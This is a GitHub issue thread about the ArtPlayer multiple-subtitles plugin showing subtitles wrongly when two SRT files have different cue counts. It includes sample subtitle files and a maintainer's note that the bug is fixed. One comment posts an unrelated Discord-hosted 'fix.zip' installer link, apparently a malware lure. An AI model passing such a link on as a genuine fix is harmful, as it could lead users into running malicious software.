### ISSUE TITLE
使用多重字幕插件时，字幕文件台词数量不一致时显示不正常

### ISSUE THREAD

**Issue by chengfengfengwang** [zhw2590582/ArtPlayer#803]
### Expected behaviour
有些字幕会选择翻译环境音，比如脚步声，而有些不会。这样会导致字幕文件台词数量不一致，期望多字幕时按照各字幕文件时间显示字幕，不去校验数量
### Actual behaviour
双字幕各台词数量不一致时导致显示错乱
### Steps to reproduce
```
file1:
1
00:00:00,000 --> 00:00:00,500
00:00

2
00:00:01,000 --> 00:00:01,500
00:01

3
00:00:02,000 --> 00:00:02,500
00:02

4
00:00:03,000 --> 00:00:03,500
00:03

5
00:00:04,000 --> 00:00:04,500
00:04
```
```
file2:
1
00:00:00,000 --> 00:00:00,500
00:00

2
00:00:01,000 --> 00:00:01,500
00:01

3
00:00:01,600 --> 00:00:01,900
00:016

4
00:00:02,000 --> 00:00:02,500
00:02

5
00:00:03,000 --> 00:00:03,500
00:03

6
00:00:04,000 --> 00:00:04,500
00:04
```

### Environment

-   Browser: Chrome
-   Version: 版本 128.0.6613.86（正式版本） (arm64)
-   Operating System: macOS 
-   Version: 14.6.1 (23G93)

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by chengfengfengwang** [comment]
> zawa999

What are you doing?

**Comment by zhw2590582** [comment]
有道理，但改动有点多，有缘再续

**Comment by zhw2590582** [comment]
在`artplayer-plugin-multiple-subtitles@1.1.0`已修复
